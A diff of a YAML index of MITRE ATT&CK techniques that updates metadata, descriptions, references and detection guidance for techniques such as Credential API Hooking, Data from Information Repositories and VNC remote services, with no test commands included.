         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41351,41 +41948,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -41414,10 +42022,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -41430,10 +42037,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -41442,11 +42059,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -41483,7 +42103,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -41515,115 +42135,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -41634,6 +42321,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -41643,7 +42331,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -41659,66 +42346,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -41743,11 +42431,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -41770,9 +42458,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
